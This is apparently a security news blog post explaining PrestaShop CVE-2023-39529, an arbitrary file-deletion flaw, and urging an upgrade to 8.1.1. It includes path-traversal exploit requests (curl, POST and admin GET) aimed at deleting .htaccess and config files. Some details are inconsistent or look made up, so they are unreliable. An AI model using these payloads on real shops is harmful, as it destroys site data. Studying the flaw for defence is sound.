CVE CyberSecurity Database News

CVE-2023-39529 - PrestaShop File Deletion Vulnerability Explained With Exploit Code

Poster -

CVE-2023-39529 is a critical security flaw discovered in PrestaShop, the popular open-source e-commerce platform. This vulnerability affects all PrestaShop versions before 8.1.1 and lets attackers delete any file from the server using the Attachments controller or the Attachments API, without any complex hacking.

In this post, we’ll break down what CVE-2023-39529 is, show how the exploit works, and explain what store owners should do about it. We use simple language and real code to make everything clear—even if you’re new to security.

What Is PrestaShop?

PrestaShop is an open source software used by thousands of stores all over the world. It’s built with PHP and lets anyone quickly launch an online shop.

What Is CVE-2023-39529?

The vulnerability was discovered by PrestaShop developers and assigned CVE ID 2023-39529. Here’s a simple description:

> Attackers can delete any file on the server by abusing how PrestaShop handles file deletion via its attachments features.

Affected versions: All before 8.1.1
Fixed in: Version 8.1.1

How It Works

PrestaShop provides a way for shop admins to upload files (attachments) to product pages. It also lets admins delete those files. Unfortunately, the code did not properly validate which files are being deleted via the Attachments controller or Attachments API. This opened the door for attackers to delete any file—even critical ones like .htaccess, config files, or even core PHP files!

How Can Attackers Exploit This?

If an attacker has access as a back office employee or abuses other features (like poorly protected APIs), they can abuse the file deletion endpoint.

The vulnerable code allows attackers to craft a malicious request that tells PrestaShop to delete any file by passing a path like ../../../../../important.php.

Example Exploit (API Call)

Let's see how a malicious request could look in real life. Suppose you have PrestaShop before 8.1.1.

Deleting a File Using a Crafted ID

PrestaShop identifies attachments via an ID. But the vulnerable code failed to sanitize this, so something like this is possible:

POST /api/attachments/../../../../config/settings.inc.php
Host: yourshop.com
Authorization: Basic [your API key]

Or in curl

curl -X DELETE "https://yourshop.com/api/attachments/../../../../.htaccess"; \
  -H "Authorization: Basic [APIKEY]"

If you substitute the correct amount of ../, you can target different locations, deleting .htaccess, important configs, or even core PHP files.

Deleting a File via Back Office Controller (Web Interface)

If you’re an authenticated employee, a similar attack can be made via the web interface by manipulating form data or URLs.

Example (not full exploit, but a clue)

GET /admin123/index.php?controller=AdminAttachments&deleteattachment=../../../../../config/settings.inc.php
Cookie: [your session cookie]

---
Important:
This attack does require some level of access—like a compromised admin account, API key, or poorly configured permissions.

Which File Can an Attacker Delete?

* Any file the web server user (e.g., www-data in Apache/Nginx) has write permission for.
* Common destructive targets:

Official Patch

PrestaShop 8.1.1 patched this bug by adding stricter checks to prevent path traversal and to verify user permissions.

Upgrade NOW:
If your shop is before 8.1.1, you must update immediately! Download the updated version from:
https://www.prestashop.com/en/download

No Workaround

Important: There is no workaround! You must patch/update. Restricting access to attachments features or API will _not_ fully protect you if a user is already authenticated.

Summary Table

| Version | Safe? | Description |
|--------------|----------|------------------------------------|
| < 8.1.1 | ❌ No | Vulnerable to file deletion |
| ≥ 8.1.1 | ✅ Yes | Safe, bug fixed |

References & Resources

- PrestaShop Security Advisory: GHSA-5qpv-48h7-49x2
- Full Patch in GitHub
- NVD Entry for CVE-2023-39529
- PrestaShop Official Download Page

Conclusion

CVE-2023-39529 is a real danger for any site running an older PrestaShop version. All it takes is one compromised credential for an attacker to wipe or destroy essential files. The best defense is patching—update to 8.1.1 or above as soon as possible!

Stay secure, and remember: keep your software up to date.


Questions or need help? Comment below or see PrestaShop’s forum for community support.

Timeline

Published on: 08/07/2023 21:15:00 UTC
Last modified on: 08/09/2023 19:46:00 UTC